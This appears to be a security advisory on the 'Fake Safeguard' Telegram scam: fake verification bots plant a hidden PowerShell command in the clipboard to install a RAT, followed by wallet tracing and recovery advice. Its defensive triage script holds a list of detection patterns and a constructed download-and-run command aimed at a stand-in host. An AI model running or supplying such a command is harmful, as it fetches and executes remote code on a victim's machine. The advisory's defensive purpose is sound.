Recently, we have received numerous victim reports related to the “Fake Safeguard” scam on Telegram. Many users lack awareness of this type of attack, leading to insufficient vigilance when encountering it. Whether they are newcomers or seasoned players, they can easily fall victim. This article will delve into the attack methods of this scam and provide effective prevention tips to help users safeguard their assets.
Scam Analysis
This type of scam mainly comes in two forms:
- Stealing Telegram accounts: Scammers lure users into providing their phone numbers, verification codes, and even two-step verification passwords to hijack their Telegram accounts.
- Planting malware on users’ computers: This method, which has become more prevalent recently, will be the focus of this article.
Example 1
During popular token airdrops, users often experience FOMO. On Telegram, they might encounter a channel interface like the one below and are prompted to click “Tap to verify”:
Clicking “Tap to verify” opens a fake Safeguard bot, seemingly performing verification. The process appears brief and urgent, pushing users to proceed.
After clicking further, the bot falsely indicates verification failure and presents a manual verification interface:
The scammers helpfully lay out Step 1, Step 2, and Step 3 instructions. By this point the malicious command has already been copied to the user’s clipboard, but nothing has executed: as long as the user does not carry out the steps, the computer stays clean. The steps amount to pasting the clipboard contents and running them, and doing so is what infects the machine.
Example 2
Scammers impersonate KOLs and use fake bots to guide users into executing malicious PowerShell commands. They create fake X accounts, post Telegram links in the comments under popular posts, and invite users to join “exclusive” Telegram groups for investment opportunities. For example, a fake account in @BTW0205’s comment section might look enticing.
Users who join the corresponding Telegram channel are guided through a fake Safeguard verification process similar to the previous example.
After clicking the verification button, users are shown Step 1, Step 2, and Step 3 instructions, and the malicious command is copied to their clipboard without any visible indication. The Run dialog shows only the beginning of a long command, and the planted text is arranged so that the visible part starts with a harmless-looking word, often “Telegram”, while the actual command sits further along the line where the user does not see it.
The command is typically a PowerShell one-liner that downloads and executes a further stage, such as a remote access Trojan (RAT) like Remcos. With a RAT on the machine the attacker has full interactive control: they can search the disk for wallet files, mnemonic phrases, and private keys, capture passwords as they are typed, and move assets directly from the victim’s wallets. For details about the “Fake Safeguard” malware, refer to SlowMist Zone whitehat Jose’s analysis: Link.
The comment section of the Ethereum Foundation account, @ethereumfndn, has also been affected by this scam, which operates using a large-scale net-casting strategy to exploit victims.
Most recently, Trump’s X comment section has also been contaminated by this scam.
If you go through the flow on a mobile device instead, the scam cannot plant a command to run, so it works toward taking over your Telegram account, walking you step by step into handing over access. If you notice in time, immediately open Telegram’s Settings > Privacy and Security > Active Sessions and select Terminate all other sessions, then enable Two-Step Verification or change its password if it was already set.
If you are not using a Windows computer but a Mac instead, similar methods are employed to trick you into infecting your computer. The approach is comparable: when the following screen appears in Telegram, your clipboard has already been secretly embedded with malicious code.
At this stage, no risk has materialized yet. However, if you follow the suggested steps, the following consequences will occur:
MistTrack Analysis
We selected several hacker addresses and analyzed them using the on-chain tracking and anti-money laundering platform, MistTrack.
Solana Hacker Addresses:
- HVJGvGZpREPQZBTScZMBMmVzwiaVNN2MfSWLgeP6CrzV
- 2v1DUcjyNBerUcYcmjrDZNpxfFuQ2Nj28kZ9mea3T36W
- D8TnJAXML7gEzUdGhY5T7aNfQQXxfr8k5huC6s11ea5R
These addresses collectively profited over $1.2 million, including SOL and various SPL tokens.
The hackers swapped most of the SPL tokens for SOL, then moved the SOL to multiple addresses, with deposits flowing into platforms such as Binance, Huobi, and FixedFloat:
Additionally, the address HVJGvGZpREPQZBTScZMBMmVzwiaVNN2MfSWLgeP6CrzV still holds 1,169.73 SOL and tokens valued at over $10,000.
Next, we analyzed an Ethereum hacker address: 0x21b681c98ebc32a9c6696003fc4050f63bc8b2c6. The address conducted its first transaction in January 2025, operates across multiple blockchains, and currently holds a balance of approximately $130,000.
Funds were transferred to platforms like ChangeNOW, eXch, and Cryptomus.com.
Prevention Tips
If your computer is compromised:
- Immediately move funds out of every wallet that was ever stored or unlocked on that machine, to new addresses generated on a clean device. Do not assume a password-protected extension wallet is safe: a RAT can copy the encrypted vault file and capture the password the next time you type it.
- From a clean device, change the passwords and enable two-factor authentication (2FA) for every account whose credentials were saved in the browsers on the compromised computer.
- Change the credentials of any other accounts that were logged in on the computer, such as Telegram, and terminate their other active sessions where the service allows it.
Assume the worst-case scenario: your computer is entirely transparent to the attacker. Think from the hacker’s perspective: if they had full control of a computer active in the Web3/Crypto world, what could they exploit?
Finally, back up your essential data (documents, not programs or wallet files, which may carry the malware with them), then reinstall the operating system from a known-good installation medium. Afterward, install a reputable antivirus program such as AVG, Bitdefender, or Kaspersky, and run a full system scan. Once these steps are completed, the computer itself can be considered clean again, but every key and password that was on it must still be treated as exposed.
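The two moments that matter in the examples above are the one where the command is sitting in the clipboard but has not run yet, and the one where it has already been executed and the machine must be triaged. The following PowerShell script is an added example, not code from SlowMist or from the scam itself. It checks both: the current clipboard text, the Run-dialog history that Explorer keeps under HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU, and PowerShell script-block log events (event Id 4104, only present if that logging is enabled). The indicator list and the sample string are assumptions chosen to illustrate the visible-prefix trick; the real payload is not reproduced here. It assumes Windows PowerShell 5.1 or later on Windows.

```powershell
#Requires -Version 5.1
# Triage helper for a Windows machine that has been through a "Fake Safeguard"
# prompt. Added example, not from the article. It looks in three places:
#   1. the clipboard: the fake verification page plants its command here,
#   2. the Run-dialog history Explorer keeps under HKCU\...\Explorer\RunMRU,
#   3. PowerShell script-block log events (Id 4104), when that logging is on.
# The indicator list and the sample string are assumptions, not the real payload.

$SuspiciousPatterns = @(
    'powershell(\.exe)?\s', 'pwsh(\.exe)?\s', 'mshta(\.exe)?\s',
    '\b(iwr|irm|iex)\b', 'Invoke-WebRequest', 'Invoke-RestMethod',
    'Invoke-Expression', 'DownloadString', 'DownloadFile',
    '-w(indowstyle)?\s+hidden', '-e(c|nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}',
    '-nop\b', '-ep\s+bypass', '-executionpolicy\s+bypass',
    'bitsadmin', 'certutil.*-urlcache'
)

function Get-DecodedCommand {
    # Return the UTF-16LE script hidden behind -EncodedCommand/-enc, if any.
    param([string]$Text)
    $m = [regex]::Match($Text, '-e(c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{20,})', 'IgnoreCase')
    if (-not $m.Success) { return $null }
    try { return [Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($m.Groups[2].Value)) }
    catch { return $null }
}

function Test-SuspiciousCommand {
    # Match the indicators against the text and against any decoded payload.
    param([string]$Text)
    $decoded  = Get-DecodedCommand $Text
    $haystack = if ($decoded) { "$Text`n$decoded" } else { $Text }
    $hits     = @($SuspiciousPatterns | Where-Object { $haystack -match $_ })
    [pscustomobject]@{
        Suspicious  = ($hits.Count -gt 0)
        Hits        = $hits
        Decoded     = $decoded
        # Roughly what the Run box shows: only the head of a long line, so an
        # innocuous leading word hides everything after it.
        VisibleHead = $Text.Substring(0, [Math]::Min(40, $Text.Length))
    }
}

function Get-RunHistory {
    # Explorer stores each Win+R entry as values a, b, c ... suffixed "\1";
    # MRUList holds the letters in most-recent-first order.
    $key = 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU'
    if (-not (Test-Path $key)) { return }
    $p = Get-ItemProperty -Path $key
    if (-not $p.MRUList) { return }
    foreach ($c in $p.MRUList.ToCharArray()) {
        $v = $p.("$c")
        if ($v) { $v -replace '\\1$', '' }
    }
}

function Get-ScriptBlockEvents {
    # Event 4104 carries the script text in Properties[2]; it exists only when
    # script-block logging is enabled (Get-WinEvent throws if there are none).
    param([int]$Last = 100)
    try {
        Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-PowerShell/Operational'; Id = 4104 } -MaxEvents $Last -ErrorAction Stop |
            ForEach-Object { [pscustomobject]@{ Time = $_.TimeCreated; Script = [string]$_.Properties[2].Value } }
    } catch { }
}

# Constructed sample (assumption, not the attackers' string): a harmless-looking
# word first, the real command pushed far to the right, so that a narrow Run
# box previews nothing but "Telegram".
$sample = 'Telegram' + (' ' * 120) + 'powershell -w hidden -nop -c "iex (iwr http://example.invalid/x)"'
Test-SuspiciousCommand $sample | Format-List

# 1. Clipboard: a victim who clicked "verify" but has not pasted yet is here.
$clip = Get-Clipboard -Raw -ErrorAction SilentlyContinue
if ($clip) {
    $r = Test-SuspiciousCommand $clip
    if ($r.Suspicious) { Write-Warning "Clipboard holds a download-and-run command: $($r.Hits -join ', ')" }
}

# 2. Run-dialog history: evidence the command was already executed.
foreach ($cmd in Get-RunHistory) {
    $r = Test-SuspiciousCommand $cmd
    if ($r.Suspicious) { Write-Warning "RunMRU entry (shown as '$($r.VisibleHead)'): $cmd" }
}

# 3. Script-block log: the actual PowerShell that ran, including decoded stages.
foreach ($ev in Get-ScriptBlockEvents) {
    $r = Test-SuspiciousCommand $ev.Script
    if ($r.Suspicious) { Write-Warning "$($ev.Time) script block matched: $($r.Hits -join ', ')" }
}
```

Run it from a PowerShell prompt on the suspect machine before reinstalling, and keep the RunMRU entries and 4104 events as evidence: they tell you whether the command was merely copied or actually executed, which decides whether the wallet-moving steps above are urgent or precautionary. The RunMRU key survives reboots, so it is worth checking even days later; the clipboard does not.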
Conclusion
The “Fake Safeguard” scam has evolved into a sophisticated attack model, from impersonating comments to malware implantation and asset theft. As attack methods become increasingly refined, users must stay vigilant against misleading links and procedures. By enhancing awareness, strengthening defenses, and promptly addressing potential threats, users can effectively protect themselves from such scams.